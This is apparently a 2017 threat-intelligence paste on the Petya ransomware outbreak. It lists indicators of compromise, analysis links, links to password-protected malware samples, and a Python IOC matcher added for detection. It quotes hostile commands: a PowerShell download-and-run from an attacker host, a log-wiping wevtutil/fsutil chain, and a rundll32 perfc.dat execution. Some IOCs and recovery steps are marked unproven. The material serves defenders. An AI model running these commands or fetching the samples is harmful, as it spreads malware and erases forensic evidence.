_c0mrad

PetyaTargetFiles

Jun 27th, 2017
#petya #petrWrap

Ransomware attack.

Got new info? Email at isox@vulners.com

*********** Bitcoin wallet monitoring

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

*********** Possible malware files:
https://yadi.sk/d/S0-ZhPY53KWc84
https://yadi.sk/d/Zpkm88sp3KWc8v
Archive password: virus

*********** Vulnerabilities/Vectors/Actions:
MS17-010: https://vulners.com/search?query=ms17-010%20order:published

PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is a legitimate PsExec binary

Remote WMI: “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”

Log cleaning: «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»

Creates a scheduled task that reboots the machine 1 hour after infection. If the task is removed before the hour elapses, it is not rescheduled, which can buy time.
  26.  
*********** Possible IP addresses:
185.165.29.78
84.200.16.242
111.90.139.247
95.141.115.108

*********** Email:
wowsmith123456@posteo.net

*********** Malware dropped file:
http://185.165.29.78/~alex/svchost.exe

*********** Analysis:
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
https://twitter.com/PolarToffee/status/879709615675641856

*********** Hashes by codexgigas team:

For 185.165.29.78, we have:

a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f

As droppers

And for 84.200.16.242:

7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d

*********** Targeted extensions by @GasGeverij
.3ds .7z .accdb .ai .asp .aspx .avhd .back .bak .c .cfg .conf .cpp .cs .ctl .dbf .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .kdbx .mail .mdb .msg .nrg .ora .ost .ova .ovf .pdf .php .pmf .ppt .pptx .pst .pvi .py .pyc .rar .rtf .sln .sql .tar .vbox .vbs .vcb .vdi .vfd .vmc .vmdk .vmsd .vmx .vsdx .vsv .work .xls .xlsx .xvd .zip

  68.  
*********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
- - - - - - - - - - - - - - - - - - - - - - - -

File Name Order-20062017.doc (RTF with CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data

Connects to the host:

84.200.16.242 80

h11p://84.200.16.242/myguy.xls

File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes


!!!! Unproven
Connects to the host:

111.90.139.247 80
COFFEINOFFICE.XYZ 80

Pay attention: the trojan for which I give the markers could potentially be used to load the encryption part.

  111.  
*********** IOC by Informzachita (infosec.ru)
  113.  
type,value,comment,to_ids,date
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627
Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627
Network activity,ip-dst|port,"111.90.139.247|80","",1,20170627
Network activity,domain,"coffeinoffice.xyz","",1,20170627
Network activity,ip-dst,"95.141.115.108","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"84.200.16.242","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"111.90.139.247","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"185.165.29.78","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
External analysis,comment,"attack-vector:phishing","",0,20170627
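As an added example (not part of the paste or of any of the sources it cites), the Python below loads a subset of the Informzachita rows above into a small matcher and runs it over a few constructed endpoint events. It assumes the standard MISP CSV column order category,type,value,comment,to_ids,date (the paste's header line names only the last five), splits composite types such as filename|sha1 into their parts, drops rows with to_ids=0 as context only, and adds a command-line heuristic for the wevtutil/fsutil log-wiping sequence and the rundll32 perfc.dat invocation noted earlier in the paste. The hostnames, sample events and behaviour labels are constructed for the example.

```python
"""Operationalise the MISP-style IOC rows from the paste against sample endpoint events."""
import csv
import io
import re

# Subset of the Informzachita CSV from the paste. Each row has six fields; the
# leading one is the MISP category (assumption: standard MISP CSV column order).
IOC_CSV = """\
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
Network activity,domain,"coffeinoffice.xyz","",1,20170627
Network activity,ip-dst,"111.90.139.247","",1,20170627
Artifacts dropped,filename,"%WINDIR%\\perfc.dat","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
"""
FIELDS = ("category", "type", "value", "comment", "to_ids", "date")
HASH_TYPES = ("md5", "sha1", "sha256")


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def load_iocs(text):
    """Return {ioc_type: set(values)}. Composite types (filename|sha1, ip-dst|port)
    are split into their parts; rows with to_ids=0 (context only) are skipped."""
    indicators = {}
    for row in csv.DictReader(io.StringIO(text), fieldnames=FIELDS):
        if row["to_ids"] != "1":
            continue
        for t, v in zip(row["type"].split("|"), row["value"].split("|")):
            v = basename(v) if t == "filename" else v.lower()
            indicators.setdefault(t, set()).add(v)
    return indicators


# Behaviour heuristics for the actions described in the paste (constructed labels).
LOG_WIPE = re.compile(r"wevtutil\s+cl\s+\w+", re.I)
USN_WIPE = re.compile(r"fsutil\s+usn\s+deletejournal", re.I)
PERFC = re.compile(r"rundll32(?:\.exe)?\b.*perfc\.dat", re.I)


def match_file(ev, iocs):
    hits = [f"{h}:{ev[h].lower()}" for h in HASH_TYPES
            if ev.get(h) and ev[h].lower() in iocs.get(h, ())]
    if basename(ev.get("name", "")) in iocs.get("filename", ()):
        hits.append(f"filename:{basename(ev['name'])}")
    return hits


def match_network(ev, iocs):
    hits = []
    for key, ioc_type in (("dst_ip", "ip-dst"), ("domain", "domain"), ("url", "url")):
        val = (ev.get(key) or "").lower()
        if val and val in iocs.get(ioc_type, ()):
            hits.append(f"{ioc_type}:{val}")
    return hits  # the split-off "port" values are deliberately not matched on their own


def match_process(ev, iocs):
    cmd = ev.get("cmdline", "")
    hits = []
    if LOG_WIPE.search(cmd):
        hits.append("behaviour:eventlog-and-usn-wipe" if USN_WIPE.search(cmd)
                    else "behaviour:eventlog-clear")
    if PERFC.search(cmd):
        hits.append("behaviour:rundll32-perfc.dat")
    return hits


MATCHERS = {"file": match_file, "net": match_network, "process": match_process}


def scan(events, iocs):
    """Return [(host, [hit, ...]), ...] for every event that matched something."""
    report = []
    for ev in events:
        hits = MATCHERS.get(ev["kind"], lambda e, i: [])(ev, iocs)
        if hits:
            report.append((ev.get("host", "?"), hits))
    return report


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"kind": "file", "host": "ws01", "name": "C:\\ProgramData\\dllhost.dat"},
    {"kind": "file", "host": "ws02", "name": "C:\\Users\\a\\Downloads\\Order-20062017.doc",
     "md5": "415FE69BF32634CA98FA07633F4118E1",
     "sha1": "101CC1CB56C407D5B9149F2C3B8523350D23BA84"},
    {"kind": "net", "host": "ws02", "dst_ip": "84.200.16.242", "dst_port": 80,
     "url": "http://84.200.16.242/myguy.xls"},
    {"kind": "process", "host": "ws03", "cmdline": "cmd.exe /c wevtutil cl Setup & wevtutil cl "
     "System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:"},
    {"kind": "net", "host": "ws04", "dst_ip": "8.8.8.8", "dst_port": 53},
    {"kind": "process", "host": "ws04", "cmdline": "notepad.exe C:\\notes.txt"},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS, load_iocs(IOC_CSV)):
        print(host, hits)
```

Note that the Order-20062017.doc md5 row has to_ids=0 in the paste, so the loader drops it and the document is flagged on its sha1 and filename only; the BTC wallet is likewise loaded as context, not as a detection indicator. The wevtutil/fsutil heuristic fires on the combination rather than on any single wevtutil call, which keeps routine administrative log clearing out of the high-severity bucket.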
  167.  
  168.  
*********** Has Sysinternals utilities signature
https://twitter.com/ppeepuppy/status/879706271535972353

*********** Uses the GetExtendedTcpTable function to get a list of available endpoints
https://twitter.com/pjcampbe11/status/879709929073979392

*********** List of extensions targeted
https://twitter.com/MrCarlMcDade/status/879706580127809536

*********** Indicates possible usage of PSEXEC; on Windows that means the admin$ and c$ shares.
https://twitter.com/rikvduijn/status/879726410201526272

*********** It is confirmed that the sample 027cc... contains PSEXEC:
https://twitter.com/NVISO_Labs/status/879724733696274432

*********** Friends in Ukraine are telling me this helps to recover from Petya (untested):
https://twitter.com/msuiche/status/879722894997278720
bootrec /RebuildBcd
bootrec /fixMbr
bootrec /fixboot

*********** Petya — Enhanced WannaCry? What we know so far.
https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb

*********** Found evidence of post kernel exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
https://twitter.com/msuiche/status/879713211368525824

*********** #Petya uses long #sleep functions: if infected you have 30-40 mins to turn off your computer to save it from ransom.